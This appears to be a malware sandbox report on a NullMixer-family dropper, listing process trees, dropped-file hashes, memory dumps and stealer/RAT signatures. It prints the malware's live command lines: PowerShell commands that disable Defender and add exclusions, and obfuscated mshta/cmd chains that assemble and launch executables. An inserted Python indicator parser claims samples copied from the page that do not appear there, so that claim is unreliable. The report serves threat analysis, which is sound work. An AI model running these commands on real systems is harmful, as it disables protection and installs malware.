PID 3036 wrote to memory of 32 N/A C:\Users\Admin\AppData\Local\Temp\7zSCCC9F0A7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 3036 wrote to memory of 4956 N/A C:\Users\Admin\AppData\Local\Temp\7zSCCC9F0A7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 3036 wrote to memory of 5004 N/A C:\Users\Admin\AppData\Local\Temp\7zSCCC9F0A7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 3036 wrote to memory of 4132 N/A C:\Users\Admin\AppData\Local\Temp\7zSCCC9F0A7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 3036 wrote to memory of 2936 N/A C:\Users\Admin\AppData\Local\Temp\7zSCCC9F0A7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 3036 wrote to memory of 1068 N/A C:\Users\Admin\AppData\Local\Temp\7zSCCC9F0A7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 4956 wrote to memory of 2556 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zSCCC9F0A7\Wed062a0488e6dd1.exe
PID 5004 wrote to memory of 3472 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zSCCC9F0A7\Wed06384ea2548.exe
PID 1888 wrote to memory of 2864 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zSCCC9F0A7\Wed067ba5199af5f.exe
PID 928 wrote to memory of 2252 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zSCCC9F0A7\Wed06d8092a5ae.exe
PID 32 wrote to memory of 1628 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zSCCC9F0A7\Wed068a6c101a0e81.exe
PID 4116 wrote to memory of 980 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zSCCC9F0A7\Wed068cfd71e196da.exe

Processes

C:\Users\Admin\AppData\Local\Temp\setup_installer.exe

"C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"

C:\Users\Admin\AppData\Local\Temp\7zSCCC9F0A7\setup_install.exe

"C:\Users\Admin\AppData\Local\Temp\7zSCCC9F0A7\setup_install.exe"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Set-MpPreference -DisableRealtimeMonitoring $true -SubmitSamplesConsent NeverSend -MAPSReporting Disable

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -inputformat none -outputformat none -NonInteractive -Command Set-MpPreference -DisableRealtimeMonitoring $true -SubmitSamplesConsent NeverSend -MAPSReporting Disable

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Wed067ba5199af5f.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Wed067fa7edd4b875a.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Wed06d8092a5ae.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Wed0639114ac9fa.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Wed068cfd71e196da.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Wed068a6c101a0e81.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Wed062a0488e6dd1.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Wed06384ea2548.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Wed0625413f2fb.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Wed062272ee8a02b1746.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Wed06dffacb42ccf1c.exe

C:\Users\Admin\AppData\Local\Temp\7zSCCC9F0A7\Wed06d8092a5ae.exe

Wed06d8092a5ae.exe

C:\Users\Admin\AppData\Local\Temp\7zSCCC9F0A7\Wed068cfd71e196da.exe

Wed068cfd71e196da.exe

C:\Users\Admin\AppData\Local\Temp\7zSCCC9F0A7\Wed067fa7edd4b875a.exe

Wed067fa7edd4b875a.exe

C:\Users\Admin\AppData\Local\Temp\7zSCCC9F0A7\Wed068a6c101a0e81.exe

Wed068a6c101a0e81.exe

C:\Users\Admin\AppData\Local\Temp\7zSCCC9F0A7\Wed0639114ac9fa.exe

Wed0639114ac9fa.exe

C:\Users\Admin\AppData\Local\Temp\7zSCCC9F0A7\Wed062a0488e6dd1.exe

Wed062a0488e6dd1.exe

C:\Users\Admin\AppData\Local\Temp\7zSCCC9F0A7\Wed06384ea2548.exe

Wed06384ea2548.exe

C:\Users\Admin\AppData\Local\Temp\7zSCCC9F0A7\Wed067ba5199af5f.exe

Wed067ba5199af5f.exe

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 3036 -ip 3036

C:\Users\Admin\AppData\Local\Temp\is-5U9DJ.tmp\Wed067fa7edd4b875a.tmp

"C:\Users\Admin\AppData\Local\Temp\is-5U9DJ.tmp\Wed067fa7edd4b875a.tmp" /SL5="$40210,140785,56832,C:\Users\Admin\AppData\Local\Temp\7zSCCC9F0A7\Wed067fa7edd4b875a.exe"

C:\Users\Admin\AppData\Local\Temp\7zSCCC9F0A7\Wed062272ee8a02b1746.exe

Wed062272ee8a02b1746.exe

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 3036 -s 588

C:\Users\Admin\AppData\Local\Temp\7zSCCC9F0A7\Wed06dffacb42ccf1c.exe

Wed06dffacb42ccf1c.exe

C:\Users\Admin\AppData\Local\Temp\7zSCCC9F0A7\Wed0625413f2fb.exe

Wed0625413f2fb.exe

C:\Users\Admin\AppData\Local\Temp\7zSCCC9F0A7\Wed068a6c101a0e81.exe

C:\Users\Admin\AppData\Local\Temp\7zSCCC9F0A7\Wed068a6c101a0e81.exe

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 504 -p 1124 -ip 1124

C:\Users\Admin\AppData\Local\Temp\7zSCCC9F0A7\Wed067fa7edd4b875a.exe

"C:\Users\Admin\AppData\Local\Temp\7zSCCC9F0A7\Wed067fa7edd4b875a.exe" /SILENT

C:\Users\Admin\AppData\Local\Temp\7zSCCC9F0A7\Wed067ba5199af5f.exe

C:\Users\Admin\AppData\Local\Temp\7zSCCC9F0A7\Wed067ba5199af5f.exe

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 1124 -s 356

C:\Windows\SysWOW64\mshta.exe

"C:\Windows\System32\mshta.exe" VBsCripT: CloSe ( crEAtEobJEct ( "WSCrIpT.ShELl"). RuN ( "cmd.exe /c copy /Y ""C:\Users\Admin\AppData\Local\Temp\7zSCCC9F0A7\Wed062272ee8a02b1746.exe"" 05XkvF6f.EXe && stArt 05XkVf6F.exe /PttJqbtIGV_gKpayWgLcpQuUGXL9h& IF """" == """" for %m In ( ""C:\Users\Admin\AppData\Local\Temp\7zSCCC9F0A7\Wed062272ee8a02b1746.exe"" ) do taskkill /F /im ""%~NXm"" " , 0, true ))

C:\Users\Admin\AppData\Local\Temp\is-GPT0L.tmp\Wed067fa7edd4b875a.tmp

"C:\Users\Admin\AppData\Local\Temp\is-GPT0L.tmp\Wed067fa7edd4b875a.tmp" /SL5="$7004C,140785,56832,C:\Users\Admin\AppData\Local\Temp\7zSCCC9F0A7\Wed067fa7edd4b875a.exe" /SILENT

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /c copy /Y "C:\Users\Admin\AppData\Local\Temp\7zSCCC9F0A7\Wed062272ee8a02b1746.exe" 05XkvF6f.EXe && stArt 05XkVf6F.exe /PttJqbtIGV_gKpayWgLcpQuUGXL9h& IF "" == "" for %m In ( "C:\Users\Admin\AppData\Local\Temp\7zSCCC9F0A7\Wed062272ee8a02b1746.exe" ) do taskkill /F /im "%~NXm"

C:\Users\Admin\AppData\Local\Temp\7zSCCC9F0A7\Wed068a6c101a0e81.exe

C:\Users\Admin\AppData\Local\Temp\7zSCCC9F0A7\Wed068a6c101a0e81.exe

C:\Users\Admin\AppData\Local\Temp\05XkvF6f.EXe

05XkVf6F.exe /PttJqbtIGV_gKpayWgLcpQuUGXL9h

C:\Windows\SysWOW64\taskkill.exe

taskkill /F /im "Wed062272ee8a02b1746.exe"

C:\Windows\SysWOW64\mshta.exe

"C:\Windows\System32\mshta.exe" VBsCripT: CloSe ( crEAtEobJEct ( "WSCrIpT.ShELl"). RuN ( "cmd.exe /c copy /Y ""C:\Users\Admin\AppData\Local\Temp\05XkvF6f.EXe"" 05XkvF6f.EXe && stArt 05XkVf6F.exe /PttJqbtIGV_gKpayWgLcpQuUGXL9h& IF ""/PttJqbtIGV_gKpayWgLcpQuUGXL9h"" == """" for %m In ( ""C:\Users\Admin\AppData\Local\Temp\05XkvF6f.EXe"" ) do taskkill /F /im ""%~NXm"" " , 0, true ))

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /c copy /Y "C:\Users\Admin\AppData\Local\Temp\05XkvF6f.EXe" 05XkvF6f.EXe && stArt 05XkVf6F.exe /PttJqbtIGV_gKpayWgLcpQuUGXL9h& IF "/PttJqbtIGV_gKpayWgLcpQuUGXL9h" == "" for %m In ( "C:\Users\Admin\AppData\Local\Temp\05XkvF6f.EXe" ) do taskkill /F /im "%~NXm"

C:\Windows\SysWOW64\mshta.exe

"C:\Windows\System32\mshta.exe" vBscrIpt: ClOse ( cReateobJecT ( "wScriPT.shEll" ). Run ("C:\Windows\system32\cmd.exe /q /C Echo | sEt /P = ""MZ"" >X5W6AA.ZS & CoPY /b /y X5w6AA.ZS + ZSPELY.cNM + OJM3YR.X + SVnzW.C2 + AmtZY.zXT + LPME79O.f1 + NytFSko.4 m9WDKH25.n & STart msiexec -y .\M9WDkH25.n " , 0 , TrUe ))

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\system32\cmd.exe" /q /C Echo | sEt /P = "MZ" >X5W6AA.ZS & CoPY /b /y X5w6AA.ZS + ZSPELY.cNM + OJM3YR.X + SVnzW.C2 + AmtZY.zXT + LPME79O.f1 + NytFSko.4 m9WDKH25.n & STart msiexec -y .\M9WDkH25.n

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /S /D /c" Echo "

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /S /D /c" sEt /P = "MZ" 1>X5W6AA.ZS"

C:\Windows\SysWOW64\msiexec.exe

msiexec -y .\M9WDkH25.n

C:\Windows\System32\sihclient.exe

C:\Windows\System32\sihclient.exe /cv /W2yzwG3qEaGgnRRh4HPtg.0.2

Network

Country Destination Domain Proto

Files

C:\Users\Admin\AppData\Local\Temp\7zSCCC9F0A7\setup_install.exe

C:\Users\Admin\AppData\Local\Temp\7zSCCC9F0A7\libcurl.dll

C:\Users\Admin\AppData\Local\Temp\7zSCCC9F0A7\libcurlpp.dll

C:\Users\Admin\AppData\Local\Temp\7zSCCC9F0A7\libwinpthread-1.dll

C:\Users\Admin\AppData\Local\Temp\7zSCCC9F0A7\libgcc_s_dw2-1.dll

C:\Users\Admin\AppData\Local\Temp\7zSCCC9F0A7\Wed06384ea2548.exe

C:\Users\Admin\AppData\Local\Temp\7zSCCC9F0A7\Wed062a0488e6dd1.exe

C:\Users\Admin\AppData\Local\Temp\7zSCCC9F0A7\Wed068a6c101a0e81.exe

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_imqtk5wf.gp2.ps1

C:\Users\Admin\AppData\Local\Temp\7zSCCC9F0A7\Wed067ba5199af5f.exe

C:\Users\Admin\AppData\Local\Temp\7zSCCC9F0A7\Wed068cfd71e196da.exe

C:\Users\Admin\AppData\Local\Temp\is-5U9DJ.tmp\Wed067fa7edd4b875a.tmp

C:\Users\Admin\AppData\Local\Temp\7zSCCC9F0A7\Wed06dffacb42ccf1c.exe

C:\Users\Admin\AppData\Local\Temp\7zSCCC9F0A7\Wed0625413f2fb.exe

C:\Users\Admin\AppData\Local\Temp\is-KIN1D.tmp\idp.dll

C:\Users\Admin\AppData\Local\Temp\7zSCCC9F0A7\Wed067fa7edd4b875a.exe

C:\Users\Admin\AppData\Local\Temp\7zSCCC9F0A7\Wed062272ee8a02b1746.exe

C:\Users\Admin\AppData\Local\Temp\7zSCCC9F0A7\Wed0639114ac9fa.exe

C:\Users\Admin\AppData\Local\Temp\7zSCCC9F0A7\Wed06d8092a5ae.exe

C:\Users\Admin\AppData\Local\Temp\is-N4BAF.tmp\_isetup\_shfoldr.dll
SHA256 9884e9d1b4f8a873ccbd81f8ad0ae257776d2348d027d811a56475e028360d87
SHA512 9908e573921d5dbc3454a1c0a6c969ab8a81cc2e8b5385391d46b1a738fb06a76aa3282e0e58d0d2ffa6f27c85668cd5178e1500b8a39b1bbae04366ae6a86d3

memory/3036-173-0x0000000064940000-0x0000000064959000-memory.dmp

memory/3036-172-0x000000006FE40000-0x000000006FFC6000-memory.dmp

memory/3036-171-0x000000006B280000-0x000000006B2A6000-memory.dmp

memory/3036-170-0x000000006B440000-0x000000006B4CF000-memory.dmp

memory/3036-168-0x000000006EB40000-0x000000006EB63000-memory.dmp

memory/4788-191-0x0000000006DD0000-0x0000000006DEE000-memory.dmp

memory/4404-194-0x000000006F840000-0x000000006F88C000-memory.dmp

memory/4788-193-0x0000000006E00000-0x0000000006EA3000-memory.dmp

memory/4788-181-0x000000006F840000-0x000000006F88C000-memory.dmp

memory/4232-210-0x0000000000400000-0x0000000000422000-memory.dmp

memory/4232-213-0x0000000005280000-0x000000000538A000-memory.dmp

memory/4232-214-0x00000000051B0000-0x00000000051EC000-memory.dmp

memory/4404-215-0x00000000074D0000-0x00000000074DA000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\Wed067ba5199af5f.exe.log

MD5 e5352797047ad2c91b83e933b24fbc4f
SHA1 9bf8ac99b6cbf7ce86ce69524c25e3df75b4d772
SHA256 b4643874d42d232c55bfbb75c36da41809d0c9ba4b2a203049aa82950345325c
SHA512 dd2fc1966c8b3c9511f14801d1ce8110d6bca276a58216b5eeb0a3cfbb0cc8137ea14efbf790e63736230141da456cbaaa4e5c66f2884d4cfe68f499476fd827

memory/4232-212-0x0000000005150000-0x0000000005162000-memory.dmp

memory/4232-211-0x00000000055F0000-0x0000000005C08000-memory.dmp

memory/4788-217-0x0000000007130000-0x0000000007141000-memory.dmp

memory/4404-216-0x00000000076C0000-0x0000000007756000-memory.dmp

memory/4788-230-0x0000000007160000-0x000000000716E000-memory.dmp

memory/4404-204-0x0000000007AE0000-0x000000000815A000-memory.dmp

memory/4404-233-0x0000000007770000-0x0000000007778000-memory.dmp

memory/4788-240-0x0000000073900000-0x00000000740B0000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\AmtZY.zXT

MD5 6dd35c1b829aa136dfa8d19a3d925b02
SHA1 5443dde6e8c2948dfa2626d58c7cf957ea9fcd2c
SHA256 07e1aecb0743f29ce796de864144cfc7d64af919ca1445dc286d1be217a94298
SHA512 536a26d31e795b8c7a8b3a4b8855465dd6b287410e2c2e41d7b5ed0dccff63757d50f3a6a85455537be16515064d801c04262b391e6a81d89540f88f6532072d

C:\Users\Admin\AppData\Local\Temp\nytFSko.4

MD5 f07fb7ba321155969395fd0bb1b66ecd
SHA1 c33f97f3bcd9152263cd3a267f7718bfe74871d4
SHA256 3b408cb12cfc6e064674313ac9b2bc6e5c479209432d8a24d60638230e6d09ee
SHA512 90e444d2035dc5d64ad62f2ced9227a9f0227a97a358afc987d4efa6a93d1adc3eb8f329a670088eade9e6fd863ed8c2a6e194278c9c61eb12db90c6c04cb1cd

C:\Users\Admin\AppData\Local\Temp\m9WDKH25.n

MD5 102c7b74c9389ba3f6b3edc9d78354a5
SHA1 1f87d39721fc1248b480f3d34f53fa06881a9e60
SHA256 a0c96cecc558707b247549e2a4543d354270f8747f2c493cd1be2adb332f991e
SHA512 9e404873661be23cd92eaada3eb8e16101df306af7eda46cc35a37c59131c1452ef50d465ef7f84a222fadf8821c24ffaa93e6b2c030ba93c44623aa7106077d

C:\Users\Admin\AppData\Local\Temp\lPmE79O.f1

MD5 3d4be60221c31167e0880e394bfc4da9
SHA1 406ce7505abb85bfe841b043a3c0c9fc4accf6c5
SHA256 736b628abd066f9bbc93148f2060e750fb8e7d1df03b6a5ab4501e1b0a7ac6db
SHA512 b08998c99352173c7d016f344292362b31b66dcb78a333a4b0deb25c0abcfcade3db9687b6e1bf866d882a0c3490b2f5d7da1e4f460eff39745df823b93ce806

C:\Users\Admin\AppData\Local\Temp\SVnzW.C2

MD5 1046521a4754730fa8d91ffe7bb86dd7
SHA1 c588fef06fa101c894d165cf58b0d930b84f32bb
SHA256 de20c6946360e923936c865b9d44e038e6046ca2c733043010913f3ed94ebfc5
SHA512 ec2ba5fde73358c65eec9e3dd61e32574a34ac580d2f0afb9f545818cbaedc2d7342f4e20dcb3e57250a1e350c3a9e05ab3fee0b3fe90feeb2fdbb34cb0654c8

C:\Users\Admin\AppData\Local\Temp\OJM3YR.x

MD5 560cd503ea8d56af71af388068c37a0a
SHA1 e33edf708a7dde97afca2f5dc04b3de35a55c5ad
SHA256 f5ba7d73b7deed6a565cba19773085927dc34123633e466129a4a7a6be840cc4
SHA512 52114327d022eeb3832742ad81b1881a8efe3e66632900298e59569cb44532aa06a63a3c65d5b1ab339b8e5e285b360584bbbe0c1db68442f478a24a81132996

C:\Users\Admin\AppData\Local\Temp\ZSPeLY.cnM

MD5 b3eb9fd17e8ad098cabb8c902e9e229b
SHA1 496db608d89ede6d7e52cc12c87fd51985d77dd3
SHA256 48ff5cfc37c60e061bc6479c3fcf221527693c3e24c18e5e23e6287d4e38f3e7
SHA512 5fdbe3bac951c3c5c0e3ab21fe308b6072f5b3cb3ee9ddb414226df52268baf860b562564b024c3d817af3b5da87511762a7220493033b74dd650bc8ccf809f9

C:\Users\Admin\AppData\Local\Temp\X5W6AA.ZS

MD5 ac6ad5d9b99757c3a878f2d275ace198
SHA1 439baa1b33514fb81632aaf44d16a9378c5664fc
SHA256 9b8db510ef42b8ed54a3712636fda55a4f8cfcd5493e20b74ab00cd4f3979f2d
SHA512 bfcdcb26b6f0c288838da7b0d338c2af63798a2ece9dcd6bc07b7cadf44477e3d5cfbba5b72446c61a1ecf74a0bccc62894ea87a40730cd1d4c2a3e15a7bb55b

memory/4172-256-0x0000000000400000-0x0000000000422000-memory.dmp

memory/4404-239-0x0000000073900000-0x00000000740B0000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log

MD5 3d086a433708053f9bf9523e1d87a4e8
SHA1 b3ab5d4f282a4c8fe8c3005b8a557ed5a0e37f28
SHA256 6f8fd1b8d9788ad54eaeee329232187e24b7b43393a01aeba2d6e9675231fb69
SHA512 931ae42b4c68a4507ff2342332b08eb407050d47cf4176137ea022d0f6e513c689e998445a04c6d18d4877391705c586bfce0234632b898d41aaed0957996dfd

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 874c28a44bb613b71919f06365a823a0
SHA1 d85614eeb4e6c9517eedb93b405c4077133576e0
SHA256 77b8b49ee116b159117ac51fb2c405881beca0dc0df825e2b3020c98569f2fb9
SHA512 777df7ab41538bb2b13c56054ce7f9d593c3e5ff8f1e0bc616c438381c590d66fdf917d843154681554df8bc9a93699cea316ecca9755be9f3a264374aaea5e7

memory/4788-232-0x0000000007260000-0x000000000727A000-memory.dmp

memory/968-257-0x0000000003540000-0x00000000035E7000-memory.dmp

memory/4788-231-0x0000000007170000-0x0000000007184000-memory.dmp

memory/4788-207-0x0000000006F30000-0x0000000006F4A000-memory.dmp

memory/4788-178-0x0000000006B90000-0x0000000006BC2000-memory.dmp

memory/1124-174-0x0000000000400000-0x0000000002DAA000-memory.dmp

memory/3036-164-0x0000000000400000-0x000000000051C000-memory.dmp

memory/968-261-0x0000000003600000-0x0000000003694000-memory.dmp

memory/968-259-0x0000000003600000-0x0000000003694000-memory.dmp

memory/968-258-0x0000000003600000-0x0000000003694000-memory.dmp

memory/4404-66-0x0000000004B50000-0x0000000004B86000-memory.dmp

memory/3036-58-0x000000006FE40000-0x000000006FFC6000-memory.dmp

memory/3036-60-0x0000000064941000-0x000000006494F000-memory.dmp

memory/3036-59-0x000000006FE40000-0x000000006FFC6000-memory.dmp

memory/3036-56-0x000000006FE40000-0x000000006FFC6000-memory.dmp

memory/3036-55-0x000000006B280000-0x000000006B2A6000-memory.dmp

memory/3036-53-0x000000006B440000-0x000000006B4CF000-memory.dmp

memory/3036-54-0x000000006B440000-0x000000006B4CF000-memory.dmp

memory/3036-52-0x000000006B440000-0x000000006B4CF000-memory.dmp

memory/3036-51-0x000000006B440000-0x000000006B4CF000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\7zSCCC9F0A7\libstdc++-6.dll

MD5 5e279950775baae5fea04d2cc4526bcc
SHA1 8aef1e10031c3629512c43dd8b0b5d9060878453
SHA256 97de47068327bb822b33c7106f9cbb489480901a6749513ef5c31d229dcaca87
SHA512 666325e9ed71da4955058aea31b91e2e848be43211e511865f393b7f537c208c6b31c182f7d728c2704e9fc87e7d1be3f98f5fee4d34f11c56764e1c599afd02

memory/3036-57-0x000000006FE40000-0x000000006FFC6000-memory.dmp

memory/1760-263-0x0000000000400000-0x00000000004BD000-memory.dmp

memory/8-262-0x0000000000400000-0x0000000000414000-memory.dmp

memory/968-264-0x0000000000400000-0x000000000055D000-memory.dmp

memory/968-273-0x0000000003600000-0x0000000003694000-memory.dmp

memory/968-274-0x00000000036A0000-0x000000000565B000-memory.dmp

memory/968-275-0x0000000005660000-0x00000000056ED000-memory.dmp

memory/968-276-0x0000000005700000-0x0000000005789000-memory.dmp

memory/968-279-0x0000000005700000-0x0000000005789000-memory.dmp

memory/968-280-0x0000000000F20000-0x0000000000F21000-memory.dmp

memory/968-281-0x0000000000F30000-0x0000000000F34000-memory.dmp
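
The Files listing above mixes dropped-file paths, their four digests, and memory-dump regions in one flat stream. The following Python is an added example, not part of the report or of the sandbox's own tooling: it parses such a listing into checked indicators, rejecting any digest whose hex length does not match its algorithm (a common copy or extraction error), collects a blocklist-ready SHA256 set, and points out which PIDs had a region dumped at the 0x400000 image base, the usual first place to look for an unpacked payload. The first two sample entries are copied from this page; the third is constructed to show the length check.

```python
"""Turn the Files listing of a sandbox report (dropped-file paths, their
digests and memory-dump regions) into checked, deduplicated indicators.
Added example, not part of the report or the sandbox's own tooling."""
import re
from dataclasses import dataclass, field

# Hex length each digest must have; anything else is extraction damage,
# not an indicator worth blocking on.
HASH_LEN = {"MD5": 32, "SHA1": 40, "SHA256": 64, "SHA512": 128}

MEMORY_RE = re.compile(
    r"^memory/(?P<pid>\d+)-(?P<seq>\d+)-0x(?P<start>[0-9A-Fa-f]+)"
    r"-0x(?P<end>[0-9A-Fa-f]+)-memory\.dmp$"
)
HASH_RE = re.compile(r"^(MD5|SHA1|SHA256|SHA512)\s+([0-9A-Fa-f]+)$")
PATH_RE = re.compile(r"^[A-Za-z]:\\")


@dataclass
class DroppedFile:
    path: str
    hashes: dict = field(default_factory=dict)


@dataclass
class MemoryRegion:
    pid: int
    start: int
    end: int

    @property
    def size(self) -> int:
        return self.end - self.start


def parse_listing(text):
    """Return (files, memory_regions, errors) for one Files section."""
    files, regions, errors = [], [], []
    current = None
    for raw in text.splitlines():
        line = raw.strip()
        if not line:
            continue
        m = MEMORY_RE.match(line)
        if m:
            regions.append(MemoryRegion(int(m["pid"]), int(m["start"], 16), int(m["end"], 16)))
            current = None  # digests never belong to a dump entry
            continue
        if PATH_RE.match(line):
            current = DroppedFile(line)
            files.append(current)
            continue
        m = HASH_RE.match(line)
        if m and current is not None:
            algo, digest = m.group(1), m.group(2).lower()
            if len(digest) != HASH_LEN[algo]:
                errors.append(f"{current.path}: {algo} has {len(digest)} hex chars, expected {HASH_LEN[algo]}")
                continue
            current.hashes[algo] = digest
            continue
        errors.append(f"unrecognised line: {line}")
    return files, regions, errors


def unique_sha256(files):
    """Blocklist-ready SHA256 set; entries without a SHA256 are skipped."""
    return sorted({f.hashes["SHA256"] for f in files if "SHA256" in f.hashes})


def image_base_pids(regions):
    """PIDs with a region dumped at the classic 0x400000 image base: the
    first dumps to open when hunting for an unpacked payload."""
    return sorted({r.pid for r in regions if r.start == 0x400000})


# Sample input: first two entries copied from this page; the third entry is
# constructed with a truncated SHA1 to exercise the length check.
SAMPLE = r"""
memory/1628-120-0x0000000004990000-0x00000000049AE000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\7zSCCC9F0A7\Wed06dffacb42ccf1c.exe

MD5 cf1ef22fba3b8080deab8dd3ec2dbe79
SHA1 62c57835497002d7f760fabb77969281b4ccf3e0
SHA256 0826cf8b1478cc5c892d724e30c9d69a0fd765780f916bb0943d73f3cd3866e0
SHA512 7a997cbbbdccc75a624ee9f67632024479fdb7a1588c462479c0d4b967373290640bd6b98d08f633d5e71d026faf5343de1d3a61c125e1a04d5ea518275a9e1f

memory/8-148-0x0000000000400000-0x0000000000414000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\is-KIN1D.tmp\idp.dll

MD5 b37377d34c8262a90ff95a9a92b65ed8
SHA1 faeef415bd0bc2a08cf9fe1e987007bf28e7218d
SHA256 e5a0ad2e37dde043a0dd4ad7634961ff3f0d70e87d2db49761eb4c1f468bb02f

C:\Users\Admin\AppData\Local\Temp\constructed_example.exe

MD5 00112233445566778899aabbccddeeff
SHA1 deadbeef
"""

if __name__ == "__main__":
    files, regions, errors = parse_listing(SAMPLE)
    for f in files:
        print(f.path, f.hashes.get("SHA256", "<no sha256>"))
    print("image-base dumps from PIDs:", image_base_pids(regions))
    print("errors:", errors)
```

Feed the whole Files section of a report to parse_listing and review the errors list before shipping the SHA256 set to a blocklist; a digest that fails the length check is usually a mangled copy of a real one, and pushing it would silently match nothing.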

Analysis: behavioral28

Detonation Overview

Submitted 2024-11-10 17:24
Reported 2024-11-10 17:27
Platform win10v2004-20241007-en
Max time kernel 150s
Max time network 151s

Command Line

"C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"

Signatures

GCleaner

loader gcleaner

Gcleaner family

gcleaner

NullMixer

dropper nullmixer

Nullmixer family

nullmixer

OnlyLogger

loader onlylogger

Onlylogger family

onlylogger

PrivateLoader

loader privateloader

Privateloader family

privateloader

Raccoon

stealer raccoon

Raccoon Stealer V1 payload

Description Indicator Process Target
N/A N/A N/A N/A

Raccoon family

raccoon

RedLine

infostealer redline

RedLine payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Redline family

redline

SectopRAT

trojan rat sectoprat

SectopRAT payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Sectoprat family

sectoprat

Socelars

stealer socelars

Socelars family

socelars

Socelars payload

Description Indicator Process Target
N/A N/A N/A N/A

OnlyLogger payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

ASPack v2.12-2.42

aspackv2
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\~Xy1GPomKV09sC.Exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Control Panel\International\Geo\Nation C:\Windows\SysWOW64\mshta.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Control Panel\International\Geo\Nation C:\Windows\SysWOW64\mshta.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\setup_installer.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\7zSCE226B87\Tue1932df4dae.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\is-KQK07.tmp\Tue196397c0f84f8.tmp N/A
Key value queried \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Control Panel\International\Geo\Nation C:\Windows\SysWOW64\mshta.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSCE226B87\setup_install.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSCE226B87\Tue19cd42a7c874e44.exe N/A
